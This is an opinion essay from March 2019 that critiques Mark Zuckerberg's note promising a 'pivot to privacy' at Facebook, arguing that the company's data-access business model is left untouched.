Pivoting Privacy

3/6/2019

Earlier today, Mark Zuckerberg posted a note promising a shift in focus for the company he founded. "Public social networks," he wrote,

will continue to be very important in people's lives — for connecting with everyone you know, discovering new people, ideas and content, and giving people a voice more broadly. People find these valuable every day, and there are still a lot of useful services to build on top of them. But now, with all the ways people also want to interact privately, there's also an opportunity to build a simpler platform that's focused on privacy first.

A "pivot to privacy" was not entirely unexpected. Facebook has spent the last several years at the center of a political and public relations firestorm over the privacy of users of commercially-owned social media. And there were indications that Zuckerberg was ready to meet the backlash with changes to the business. One of the most significant in recent months was news that Facebook might merge Instagram and Messenger with its more privacy-oriented acquisition, WhatsApp. "A Privacy-Focused Vision for Social Networking" is intended to signal something more sweeping and holistic. It implies a philosophical realignment of the entire company.

I'm skeptical, but then, Zuckerberg anticipated as much:

I understand that many people don't think Facebook can or would even want to build this kind of privacy-focused platform -- because frankly we don't currently have a strong reputation for building privacy protective services, and we've historically focused on tools for more open sharing. But we've repeatedly shown that we can evolve to build the services that people really want, including in private messaging and stories.

That concession is cushioned with a number of half-truths. For one thing, recently publicized documents, showing that Facebook pushed media partners to pivot to video even after it became clear that users weren't as captivated as advertised, belie the idea that the company's evolution is driven by the aim of building services that people want.

More than that, though, our skepticism isn't built on the weakness of Facebook's reputation for building privacy protective services. Rather, it's their success at building communication services into tools for harvesting data about their users that makes me doubtful. To get a better sense of the difference, consider a case like that of Georgia's online voter database. Last year, a researcher realized that, by simply typing over portions of the URL, nearly anyone could view any of the 6 million voter records stores on the public-facing site. That is, of course, a colossal failure for a privacy protection service, but it was almost certainly the result of incompetence rather than design.

By contrast, inadvertent data leaks account for very little of the outrage leveled against Facebook. No one doubts the company's ability to build secure services — at least, relative to the standards of other online platforms. Rather, our distrust is founded on the long march of revelations about how the company has elected to use the data it collects — including data about people who have never opened a Facebook account — culminating in news that Facebook had allowed a Russian researcher to harvest information from tens of millions of accounts, which was then turned over to a British firm working for the Trump Campaign.

For anyone who has paid close attention, the principle worry is not that Facebook will suffer security lapses like the one that exposed voter records in Georgia; it's that their business model is built on selling access to data. In Congressional hearings, Zuckerberg repeatedly insisted that Facebook doesn't "sell people's data." That's technically true, it seems, but deliberately obscures the fact that access to data is the added value that attracts advertisers to the site. The question looming over any pivot to privacy must be: How does Facebook evolve beyond providing third-party access to data?

I see no answer to that question in Zuckerberg's note. Instead, what I see is an effort to pivot how the rest understand what constitutes privacy on commercially-owned social media platforms.

Part of the method is repetition. Variations on the word "private" appear 50 times in Zuckerberg's note. If he can get the rest of us to talk about privacy in the same terms, then he can claim at least one public relations victory. But the way that he talks about privacy doesn't necessarily cover all the concerns we've had in mind. Two themes predominate. One is security against public exposure. The other is temporality. At no point does he signal a change in how Facebook manages the relationship between Facebook's customers or advertisers and the data generated by its users.

It's possible to interpret his discussion of security as covering Facebook's role as a data broker, but doing so would require ignoring how Facebook has dealt with that topic in the past. The way that Zuckerberg writes about security in "A Privacy-Focused Vision" resonates with the testimony he recently gave before Congress. There, he emphasized that users were in control of who could access the information they post to Facebook. In order for that to be true, Zuckerberg's construal of "information" must have somehow included the user data Facebook provides to its affiliates without the explicit consent of the users that data describes. In the absence of a more explicit assurance to the contrary, there's every reason to suppose that the same exception applies in his new vision of privacy-oriented Facebook.

If so, then what he's pitching here is a vision of privacy oriented around deliberate speech. But the most disconcerting effect of social media is its propensity to expose not what we meant to say to a select few, but what we never meant to say to anyone. Facebook is built on unearthing the unspoken from our online interactions and making it available to advertisers, researchers and political operations. Nothing in Zuckerberg's new vision gives us reason to suppose that part is changing.

Arboretum emblem